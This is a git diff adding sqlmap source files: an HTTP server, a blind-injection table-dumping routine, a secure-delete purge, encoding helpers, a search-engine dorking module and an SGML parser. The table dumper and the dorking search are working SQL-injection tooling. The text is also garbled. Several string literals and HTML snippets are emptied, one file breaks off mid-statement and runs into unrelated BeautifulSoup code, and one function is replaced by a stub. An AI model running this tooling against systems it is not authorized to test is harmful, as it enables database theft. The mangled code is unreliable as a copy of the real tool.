+DISABLED_CONTENT_EXTENSIONS = (".py", ".pyc", ".md", ".txt", ".bak", ".conf", ".zip", "~") + +class ThreadingServer(_socketserver.ThreadingMixIn, _BaseHTTPServer.HTTPServer): + def finish_request(self, *args, **kwargs): + try: + _BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs) + except Exception: + if DEBUG: + traceback.print_exc() + +class ReqHandler(_BaseHTTPServer.BaseHTTPRequestHandler): + def do_GET(self): + path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "") + params = {} + content = None + + if query: + params.update(_urllib.parse.parse_qs(query)) + + for key in params: + if params[key]: + params[key] = params[key][-1] + + self.url, self.params = path, params + + if path == '/': + path = "index.html" + + path = path.strip('/') + + path = path.replace('/', os.path.sep) + path = os.path.abspath(os.path.join(HTML_DIR, path)).strip() + + if not os.path.isfile(path) and os.path.isfile("%s.html" % path): + path = "%s.html" % path + + if ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and not path.endswith(DISABLED_CONTENT_EXTENSIONS): + content = open(path, "rb").read() + self.send_response(_http_client.OK) + self.send_header(HTTP_HEADER.CONNECTION, "close") + self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream") + else: + content = ("<!DOCTYPE html><html lang=\"en\"><head><title>404 Not Found

    Not Found

    The requested URL %s was not found on this server.

    " % self.path.split('?')[0]).encode(UNICODE_ENCODING) + self.send_response(_http_client.NOT_FOUND) + self.send_header(HTTP_HEADER.CONNECTION, "close") + + if content is not None: + for match in re.finditer(b"", content): + name = match.group(1) + _ = getattr(self, "_%s" % name.lower(), None) + if _: + content = self._format(content, **{name: _()}) + + if "gzip" in self.headers.get(HTTP_HEADER.ACCEPT_ENCODING): + self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip") + _ = six.BytesIO() + compress = gzip.GzipFile("", "w+b", 9, _) + compress._stream = _ + compress.write(content) + compress.flush() + compress.close() + content = compress._stream.getvalue() + + self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content))) + + self.end_headers() + + if content: + self.wfile.write(content) + + self.wfile.flush() + + def _format(self, content, **params): + if content: + for key, value in params.items(): + content = content.replace("" % key, value) + + return content + + def version_string(self): + return VERSION_STRING + + def log_message(self, format, *args): + return + + def finish(self): + try: + _BaseHTTPServer.BaseHTTPRequestHandler.finish(self) + except Exception: + if DEBUG: + traceback.print_exc() + +def start_httpd(): + server = ThreadingServer((HTTP_ADDRESS, HTTP_PORT), ReqHandler) + thread = threading.Thread(target=server.serve_forever) + thread.daemon = True + thread.start() + + print("[i] running HTTP server at '%s:%d'" % (HTTP_ADDRESS, HTTP_PORT)) + +if __name__ == "__main__": + try: + start_httpd() + + while True: + time.sleep(1) + except KeyboardInterrupt: + pass diff --git a/src/sqlmap-master/lib/utils/pivotdumptable.py b/src/sqlmap-master/lib/utils/pivotdumptable.py new file mode 100644 index 0000000..ca7e37e --- /dev/null +++ b/src/sqlmap-master/lib/utils/pivotdumptable.py @@ -0,0 +1,188 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.agent import agent +from lib.core.bigarray import BigArray +from lib.core.common import Backend +from lib.core.common import filterNone +from lib.core.common import getSafeExString +from lib.core.common import isNoneValue +from lib.core.common import isNumPosStrValue +from lib.core.common import singleTimeWarnMessage +from lib.core.common import unArrayizeValue +from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.dicts import DUMP_REPLACEMENTS +from lib.core.enums import CHARSET_TYPE +from lib.core.enums import EXPECTED +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import MAX_INT +from lib.core.settings import NULL +from lib.core.settings import SINGLE_QUOTE_MARKER +from lib.core.unescaper import unescaper +from lib.request import inject +from lib.utils.safe2bin import safechardecode +from thirdparty.six import unichr as _unichr + +def pivotDumpTable(table, colList, count=None, blind=True, alias=None): + lengths = {} + entries = {} + + dumpNode = queries[Backend.getIdentifiedDbms()].dump_table.blind + + validColumnList = False + validPivotValue = False + + if count is None: + query = dumpNode.count % table + query = agent.whereQuery(query) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) + + if hasattr(count, "isdigit") and count.isdigit(): + count = int(count) + + if count == 0: + infoMsg = "table '%s' appears to be empty" % unsafeSQLIdentificatorNaming(table) + logger.info(infoMsg) + + for column in colList: + lengths[column] = len(column) + entries[column] = [] + + return entries, lengths + + elif not isNumPosStrValue(count): + return None + + for column in colList: + lengths[column] = 0 + entries[column] = BigArray() + + colList = filterNone(sorted(colList, key=lambda x: len(x) if x else MAX_INT)) + + if conf.pivotColumn: + for _ in colList: + if re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I): + infoMsg = "using column '%s' as a pivot " % conf.pivotColumn + infoMsg += "for retrieving row data" + logger.info(infoMsg) + + colList.remove(_) + colList.insert(0, _) + + validPivotValue = True + break + + if not validPivotValue: + warnMsg = "column '%s' not " % conf.pivotColumn + warnMsg += "found in table '%s'" % table + logger.warning(warnMsg) + + if not validPivotValue: + for column in colList: + infoMsg = "fetching number of distinct " + infoMsg += "values for column '%s'" % column.replace(("%s." % alias) if alias else "", "") + logger.info(infoMsg) + + query = dumpNode.count2 % (column, table) + query = agent.whereQuery(query) + value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if isNumPosStrValue(value): + validColumnList = True + + if value == count: + infoMsg = "using column '%s' as a pivot " % column.replace(("%s." % alias) if alias else "", "") + infoMsg += "for retrieving row data" + logger.info(infoMsg) + + validPivotValue = True + colList.remove(column) + colList.insert(0, column) + break + + if not validColumnList: + errMsg = "all provided column name(s) are non-existent" + raise SqlmapNoneDataException(errMsg) + + if not validPivotValue: + warnMsg = "no proper pivot column provided (with unique values)." + warnMsg += " It won't be possible to retrieve all rows" + logger.warning(warnMsg) + + pivotValue = " " + breakRetrieval = False + + def _(column, pivotValue): + if column == colList[0]: + query = dumpNode.query.replace("'%s'" if unescaper.escape(pivotValue, False) != pivotValue else "%s", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) + else: + query = dumpNode.query2.replace("'%s'" if unescaper.escape(pivotValue, False) != pivotValue else "%s", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False) if SINGLE_QUOTE_MARKER not in dumpNode.query2 else pivotValue) + + query = agent.whereQuery(query) + return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) + + try: + for i in xrange(count): + if breakRetrieval: + break + + for column in colList: + value = _(column, pivotValue) + if column == colList[0]: + if isNoneValue(value): + try: + for pivotValue in filterNone((" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], _unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, _unichr(ord(pivotValue[0]) + 1))): + value = _(column, pivotValue) + if not isNoneValue(value): + break + except ValueError: + pass + + if isNoneValue(value) or value == NULL: + breakRetrieval = True + break + + pivotValue = safechardecode(value) + + if conf.limitStart or conf.limitStop: + if conf.limitStart and (i + 1) < conf.limitStart: + warnMsg = "skipping first %d pivot " % conf.limitStart + warnMsg += "point values" + singleTimeWarnMessage(warnMsg) + break + elif conf.limitStop and (i + 1) > conf.limitStop: + breakRetrieval = True + break + + value = "" if isNoneValue(value) else unArrayizeValue(value) + + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) + entries[column].append(value) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warning(warnMsg) + + except SqlmapConnectionException as ex: + errMsg = "connection exception detected ('%s'). sqlmap " % getSafeExString(ex) + errMsg += "will display partial output" + + logger.critical(errMsg) + + return entries, lengths diff --git a/src/sqlmap-master/lib/utils/progress.py b/src/sqlmap-master/lib/utils/progress.py new file mode 100644 index 0000000..95f7568 --- /dev/null +++ b/src/sqlmap-master/lib/utils/progress.py @@ -0,0 +1,104 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import time + +from lib.core.common import dataToStdout +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb + +class ProgressBar(object): + """ + This class defines methods to update and draw a progress bar + """ + + def __init__(self, minValue=0, maxValue=10, totalWidth=None): + self._progBar = "[]" + self._min = int(minValue) + self._max = int(maxValue) + self._span = max(self._max - self._min, 0.001) + self._width = totalWidth if totalWidth else conf.progressWidth + self._amount = 0 + self._start = None + self.update() + + def _convertSeconds(self, value): + seconds = value + minutes = seconds // 60 + seconds = seconds - (minutes * 60) + + return "%.2d:%.2d" % (minutes, seconds) + + def update(self, newAmount=0): + """ + This method updates the progress bar + """ + + if newAmount < self._min: + newAmount = self._min + elif newAmount > self._max: + newAmount = self._max + + self._amount = newAmount + + # Figure out the new percent done, round to an integer + diffFromMin = float(self._amount - self._min) + percentDone = (diffFromMin / float(self._span)) * 100.0 + percentDone = round(percentDone) + percentDone = min(100, int(percentDone)) + + # Figure out how many hash bars the percentage should be + allFull = self._width - len("100%% [] %s/%s (ETA 00:00)" % (self._max, self._max)) + numHashes = (percentDone / 100.0) * allFull + numHashes = int(round(numHashes)) + + # Build a progress bar with an arrow of equal signs + if numHashes == 0: + self._progBar = "[>%s]" % (" " * (allFull - 1)) + elif numHashes == allFull: + self._progBar = "[%s]" % ("=" * allFull) + else: + self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes)) + + # Add the percentage at the beginning of the progress bar + percentString = getUnicode(percentDone) + "%" + self._progBar = "%s %s" % (percentString, self._progBar) + + def progress(self, newAmount): + """ + This method saves item delta time and shows updated progress bar with calculated eta + """ + + if self._start is None or newAmount > self._max: + self._start = time.time() + eta = None + else: + delta = time.time() - self._start + eta = (self._max - self._min) * (1.0 * delta / newAmount) - delta + + self.update(newAmount) + self.draw(eta) + + def draw(self, eta=None): + """ + This method draws the progress bar if it has changed + """ + + dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" (ETA %s)" % (self._convertSeconds(int(eta)) if eta is not None else "??:??")))) + if self._amount >= self._max: + dataToStdout("\r%s\r" % (" " * self._width)) + kb.prependFlag = False + + def __str__(self): + """ + This method returns the progress bar string + """ + + return getUnicode(self._progBar) diff --git a/src/sqlmap-master/lib/utils/purge.py b/src/sqlmap-master/lib/utils/purge.py new file mode 100644 index 0000000..9886fb0 --- /dev/null +++ b/src/sqlmap-master/lib/utils/purge.py @@ -0,0 +1,86 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import functools +import os +import random +import shutil +import stat +import string + +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.compat import xrange +from lib.core.convert import getUnicode +from lib.core.data import logger +from thirdparty.six import unichr as _unichr + +def purge(directory): + """ + Safely removes content from a given directory + """ + + if not os.path.isdir(directory): + warnMsg = "skipping purging of directory '%s' as it does not exist" % directory + logger.warning(warnMsg) + return + + infoMsg = "purging content of directory '%s'..." % directory + logger.info(infoMsg) + + filepaths = [] + dirpaths = [] + + for rootpath, directories, filenames in os.walk(directory): + dirpaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in directories) + filepaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in filenames) + + logger.debug("changing file attributes") + for filepath in filepaths: + try: + os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) + except: + pass + + logger.debug("writing random data to files") + for filepath in filepaths: + try: + filesize = os.path.getsize(filepath) + with openFile(filepath, "w+b") as f: + f.write("".join(_unichr(random.randint(0, 255)) for _ in xrange(filesize))) + except: + pass + + logger.debug("truncating files") + for filepath in filepaths: + try: + with open(filepath, 'w') as f: + pass + except: + pass + + logger.debug("renaming filenames to random values") + for filepath in filepaths: + try: + os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) + except: + pass + + dirpaths.sort(key=functools.cmp_to_key(lambda x, y: y.count(os.path.sep) - x.count(os.path.sep))) + + logger.debug("renaming directory names to random values") + for dirpath in dirpaths: + try: + os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) + except: + pass + + logger.debug("deleting the whole directory tree") + try: + shutil.rmtree(directory) + except OSError as ex: + logger.error("problem occurred while removing directory '%s' ('%s')" % (getUnicode(directory), getSafeExString(ex))) diff --git a/src/sqlmap-master/lib/utils/safe2bin.py b/src/sqlmap-master/lib/utils/safe2bin.py new file mode 100644 index 0000000..b1da5db --- /dev/null +++ b/src/sqlmap-master/lib/utils/safe2bin.py @@ -0,0 +1,103 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import binascii +import re +import string +import sys + +PY3 = sys.version_info >= (3, 0) + +if PY3: + xrange = range + text_type = str + string_types = (str,) + unichr = chr +else: + text_type = unicode + string_types = (basestring,) + +# Regex used for recognition of hex encoded characters +HEX_ENCODED_CHAR_REGEX = r"(?P\\x[0-9A-Fa-f]{2})" + +# Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n) +SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" + +# Characters that don't need to be safe encoded +SAFE_CHARS = "".join([_ for _ in string.printable.replace('\\', '') if _ not in SAFE_ENCODE_SLASH_REPLACEMENTS]) + +# Prefix used for hex encoded values +HEX_ENCODED_PREFIX = r"\x" + +# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding) +HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__" + +# String used for temporary marking of slash characters +SLASH_MARKER = "__SLASH__" + +def safecharencode(value): + """ + Returns safe representation of a given basestring value + + >>> safecharencode(u'test123') == u'test123' + True + >>> safecharencode(u'test\x01\x02\xaf') == u'test\\\\x01\\\\x02\\xaf' + True + """ + + retVal = value + + if isinstance(value, string_types): + if any(_ not in SAFE_CHARS for _ in value): + retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER) + retVal = retVal.replace('\\', SLASH_MARKER) + + for char in SAFE_ENCODE_SLASH_REPLACEMENTS: + retVal = retVal.replace(char, repr(char).strip('\'')) + + for char in set(retVal): + if not (char in string.printable or isinstance(value, text_type) and ord(char) >= 160): + retVal = retVal.replace(char, '\\x%02x' % ord(char)) + + retVal = retVal.replace(SLASH_MARKER, "\\\\") + retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX) + elif isinstance(value, list): + for i in xrange(len(value)): + retVal[i] = safecharencode(value[i]) + + return retVal + +def safechardecode(value, binary=False): + """ + Reverse function to safecharencode + """ + + retVal = value + if isinstance(value, string_types): + retVal = retVal.replace('\\\\', SLASH_MARKER) + + while True: + match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) + if match: + retVal = retVal.replace(match.group("result"), unichr(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) + else: + break + + for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: + retVal = retVal.replace(repr(char).strip('\''), char) + + retVal = retVal.replace(SLASH_MARKER, '\\') + + if binary: + if isinstance(retVal, text_type): + retVal = retVal.encode("utf8", errors="surrogatepass" if PY3 else "strict") + + elif isinstance(value, (list, tuple)): + for i in xrange(len(value)): + retVal[i] = safechardecode(value[i]) + + return retVal diff --git a/src/sqlmap-master/lib/utils/search.py b/src/sqlmap-master/lib/utils/search.py new file mode 100644 index 0000000..dd0b040 --- /dev/null +++ b/src/sqlmap-master/lib/utils/search.py @@ -0,0 +1,213 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re +import socket + +from lib.core.common import getSafeExString +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import readInput +from lib.core.common import urlencode +from lib.core.convert import getBytes +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HTTP_HEADER +from lib.core.enums import REDIRECTION +from lib.core.exception import SqlmapBaseException +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import BING_REGEX +from lib.core.settings import DUCKDUCKGO_REGEX +from lib.core.settings import DUMMY_SEARCH_USER_AGENT +from lib.core.settings import GOOGLE_CONSENT_COOKIE +from lib.core.settings import GOOGLE_REGEX +from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE +from lib.core.settings import UNICODE_ENCODING +from lib.request.basic import decodePage +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib +from thirdparty.socks import socks + +def _search(dork): + """ + This method performs the effective search on Google providing + the google dork and the Google session cookie + """ + + if not dork: + return None + + page = None + data = None + requestHeaders = {} + responseHeaders = {} + + requestHeaders[HTTP_HEADER.USER_AGENT] = dict(conf.httpHeaders).get(HTTP_HEADER.USER_AGENT, DUMMY_SEARCH_USER_AGENT) + requestHeaders[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE + requestHeaders[HTTP_HEADER.COOKIE] = GOOGLE_CONSENT_COOKIE + + try: + req = _urllib.request.Request("https://www.google.com/ncr", headers=requestHeaders) + conn = _urllib.request.urlopen(req) + except Exception as ex: + errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) + raise SqlmapConnectionException(errMsg) + + gpage = conf.googlePage if conf.googlePage > 1 else 1 + logger.info("using search result page #%d" % gpage) + + url = "https://www.google.com/search?" # NOTE: if consent fails, try to use the "http://" + url += "q=%s&" % urlencode(dork, convall=True) + url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" + url += "&start=%d" % ((gpage - 1) * 100) + + try: + req = _urllib.request.Request(url, headers=requestHeaders) + conn = _urllib.request.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except _urllib.error.HTTPError as ex: + try: + page = ex.read() + responseHeaders = ex.info() + except Exception as _: + warnMsg = "problem occurred while trying to get " + warnMsg += "an error page information (%s)" % getSafeExString(_) + logger.critical(warnMsg) + return None + except (_urllib.error.URLError, _http_client.error, socket.error, socket.timeout, socks.ProxyError): + errMsg = "unable to connect to Google" + raise SqlmapConnectionException(errMsg) + + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) + + page = getUnicode(page) # Note: if decodePage call fails (Issue #4202) + + retVal = [_urllib.parse.unquote(match.group(1) or match.group(2)) for match in re.finditer(GOOGLE_REGEX, page, re.I)] + + if not retVal and "detected unusual traffic" in page: + warnMsg = "Google has detected 'unusual' traffic from " + warnMsg += "used IP address disabling further searches" + + if conf.proxyList: + raise SqlmapBaseException(warnMsg) + else: + logger.critical(warnMsg) + + if not retVal: + message = "no usable links found. What do you want to do?" + message += "\n[1] (re)try with DuckDuckGo (default)" + message += "\n[2] (re)try with Bing" + message += "\n[3] quit" + choice = readInput(message, default='1') + + if choice == '3': + raise SqlmapUserQuitException + elif choice == '2': + url = "https://www.bing.com/search?q=%s&first=%d" % (urlencode(dork, convall=True), (gpage - 1) * 10 + 1) + regex = BING_REGEX + else: + url = "https://html.duckduckgo.com/html/" + data = "q=%s&s=%d" % (urlencode(dork, convall=True), (gpage - 1) * 30) + regex = DUCKDUCKGO_REGEX + + try: + req = _urllib.request.Request(url, data=getBytes(data), headers=requestHeaders) + conn = _urllib.request.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except _urllib.error.HTTPError as ex: + try: + page = ex.read() + page = decodePage(page, ex.headers.get("Content-Encoding"), ex.headers.get("Content-Type")) + except socket.timeout: + warnMsg = "connection timed out while trying " + warnMsg += "to get error page information (%d)" % ex.code + logger.critical(warnMsg) + return None + except: + errMsg = "unable to connect" + raise SqlmapConnectionException(errMsg) + + page = getUnicode(page) # Note: if decodePage call fails (Issue #4202) + + retVal = [_urllib.parse.unquote(match.group(1).replace("&", "&")) for match in re.finditer(regex, page, re.I | re.S)] + + if not retVal and "issue with the Tor Exit Node you are currently using" in page: + warnMsg = "DuckDuckGo has detected 'unusual' traffic from " + warnMsg += "used (Tor) IP address" + + if conf.proxyList: + raise SqlmapBaseException(warnMsg) + else: + logger.critical(warnMsg) + + return retVal + +@stackedmethod +def search(dork): + pushValue(kb.choices.redirect) + kb.choices.redirect = REDIRECTION.YES + + try: + return _search(dork) + except SqlmapBaseException as ex: + if conf.proxyList: + logger.critical(getSafeExString(ex)) + + warnMsg = "changing proxy" + logger.warning(warnMsg) + + conf.proxy = None + + setHTTPHandlers() + return search(dork) + else: + raise + finally: + kb.choices.redirect = popValue() + +def setHTTPHandlers(): # Cross-referenced function + raise NotImplementedError diff --git a/src/sqlmap-master/lib/utils/sgmllib.py b/src/sqlmap-master/lib/utils/sgmllib.py new file mode 100644 index 0000000..afcdff9 --- /dev/null +++ b/src/sqlmap-master/lib/utils/sgmllib.py @@ -0,0 +1,574 @@ +"""A parser for SGML, using the derived class as a static DTD.""" + +# Note: missing in Python3 + +# XXX This only supports those SGML features used by HTML. + +# XXX There should be a way to distinguish between PCDATA (parsed +# character data -- the normal case), RCDATA (replaceable character +# data -- only char and entity references and end tags are special) +# and CDATA (character data -- only end tags are special). RCDATA is +# not supported at all. + +from __future__ import print_function + +try: + import _markupbase as markupbase +except: + import markupbase + +import re + +__all__ = ["SGMLParser", "SGMLParseError"] + +# Regular expressions used for parsing + +interesting = re.compile('[&<]') +incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|' + '<([a-zA-Z][^<>]*|' + '/([a-zA-Z][^<>]*)?|' + '![^<>]*)?') + +entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]') +charref = re.compile('&#([0-9]+)[^0-9]') + +starttagopen = re.compile('<[>a-zA-Z]') +shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/') +shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/') +piclose = re.compile('>') +endbracket = re.compile('[<>]') +tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*') +attrfind = re.compile( + r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*' + r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?') + + +class SGMLParseError(RuntimeError): + """Exception raised for all parse errors.""" + pass + + +# SGML parser base class -- find tags and call handler functions. +# Usage: p = SGMLParser(); p.feed(data); ...; p.close(). +# The dtd is defined by deriving a class which defines methods +# with special names to handle tags: start_foo and end_foo to handle +# and , respectively, or do_foo to handle by itself. +# (Tags are converted to lower case for this purpose.) The data +# between tags is passed to the parser by calling self.handle_data() +# with some data as argument (the data may be split up in arbitrary +# chunks). Entity references are passed by calling +# self.handle_entityref() with the entity reference as argument. + +class SGMLParser(markupbase.ParserBase): + # Definition of entities -- derived classes may override + entity_or_charref = re.compile('&(?:' + '([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)' + ')(;?)') + + def __init__(self, verbose=0): + """Initialize and reset this instance.""" + self.verbose = verbose + self.reset() + + def reset(self): + """Reset this instance. Loses all unprocessed data.""" + self.__starttag_text = None + self.rawdata = '' + self.stack = [] + self.lasttag = '???' + self.nomoretags = 0 + self.literal = 0 + markupbase.ParserBase.reset(self) + + def setnomoretags(self): + """Enter literal mode (CDATA) till EOF. + + Intended for derived classes only. + """ + self.nomoretags = self.literal = 1 + + def setliteral(self, *args): + """Enter literal mode (CDATA). + + Intended for derived classes only. + """ + self.literal = 1 + + def feed(self, data): + """Feed some data to the parser. + + Call this as often as you want, with as little or as much text + as you want (may include '\n'). (This just saves the text, + all the processing is done by goahead().) + """ + + self.rawdata = self.rawdata + data + self.goahead(0) + + def close(self): + """Handle the remaining data.""" + self.goahead(1) + + def error(self, message): + raise SGMLParseError(message) + + # Internal -- handle data as far as reasonable. May leave state + # and data to be processed by a subsequent call. If 'end' is + # true, force handling all data as if followed by EOF marker. + def goahead(self, end): + rawdata = self.rawdata + i = 0 + n = len(rawdata) + while i < n: + if self.nomoretags: + self.handle_data(rawdata[i:n]) + i = n + break + match = interesting.search(rawdata, i) + if match: + j = match.start() + else: + j = n + if i < j: + self.handle_data(rawdata[i:j]) + i = j + if i == n: + break + if rawdata[i] == '<': + if starttagopen.match(rawdata, i): + if self.literal: + self.handle_data(rawdata[i]) + i = i + 1 + continue + k = self.parse_starttag(i) + if k < 0: + break + i = k + continue + if rawdata.startswith(" (i + 1): + self.handle_data("<") + i = i + 1 + else: + # incomplete + break + continue + if rawdata.startswith("" % NavigableString.__str__(self, encoding) + +class Declaration(NavigableString): + def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): + return "" % NavigableString.__str__(self, encoding) + +class Tag(PageElement): + + """Represents a found HTML tag with its attributes and contents.""" + + def _convertEntities(self, match): + """Used in a call to re.sub to replace HTML, XML, and numeric + entities with the appropriate Unicode characters. If HTML + entities are being converted, any unrecognized entities are + escaped.""" + try: + x = match.group(1) + if self.convertHTMLEntities and x in name2codepoint: + return unichr(name2codepoint[x]) + elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: + if self.convertXMLEntities: + return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] + else: + return u'&%s;' % x + elif len(x) > 0 and x[0] == '#': + # Handle numeric entities + if len(x) > 1 and x[1] == 'x': + return unichr(int(x[2:], 16)) + else: + return unichr(int(x[1:])) + + elif self.escapeUnrecognizedEntities: + return u'&%s;' % x + + except ValueError: # e.g. ValueError: unichr() arg not in range(0x10000) + pass + + return u'&%s;' % x + + def __init__(self, parser, name, attrs=None, parent=None, + previous=None): + "Basic constructor." + + # We don't actually store the parser object: that lets extracted + # chunks be garbage-collected + self.parserClass = parser.__class__ + self.isSelfClosing = parser.isSelfClosingTag(name) + self.name = name + if attrs is None: + attrs = [] + elif isinstance(attrs, dict): + attrs = attrs.items() + self.attrs = attrs + self.contents = [] + self.setup(parent, previous) + self.hidden = False + self.containsSubstitutions = False + self.convertHTMLEntities = parser.convertHTMLEntities + self.convertXMLEntities = parser.convertXMLEntities + self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities + + # Convert any HTML, XML, or numeric entities in the attribute values. + # Reference: https://github.com/pkrumins/xgoogle/pull/16/commits/3dba1165c436b0d6e5bdbd09e53ca0dbf8a043f8 + convert = lambda k_val: (k_val[0], + re.sub(r"&(#\d+|#x[0-9a-fA-F]+|\w+);", + self._convertEntities, + k_val[1])) + self.attrs = map(convert, self.attrs) + + def getString(self): + if (len(self.contents) == 1 + and isinstance(self.contents[0], NavigableString)): + return self.contents[0] + + def setString(self, string): + """Replace the contents of the tag with a string""" + self.clear() + self.append(string) + + string = property(getString, setString) + + def getText(self, separator=u""): + if not len(self.contents): + return u"" + stopNode = self._lastRecursiveChild().next + strings = [] + current = self.contents[0] + while current and current is not stopNode: + if isinstance(current, NavigableString): + strings.append(current.strip()) + current = current.next + return separator.join(strings) + + text = property(getText) + + def get(self, key, default=None): + """Returns the value of the 'key' attribute for the tag, or + the value given for 'default' if it doesn't have that + attribute.""" + return self._getAttrMap().get(key, default) + + def clear(self): + """Extract all children.""" + for child in self.contents[:]: + child.extract() + + def index(self, element): + for i, child in enumerate(self.contents): + if child is element: + return i + raise ValueError("Tag.index: element not in tag") + + def has_key(self, key): + return self._getAttrMap().has_key(key) + + def __getitem__(self, key): + """tag[key] returns the value of the 'key' attribute for the tag, + and throws an exception if it's not there.""" + return self._getAttrMap()[key] + + def __iter__(self): + "Iterating over a tag iterates over its contents." + return iter(self.contents) + + def __len__(self): + "The length of a tag is the length of its list of contents." + return len(self.contents) + + def __contains__(self, x): + return x in self.contents + + def __nonzero__(self): + "A tag is non-None 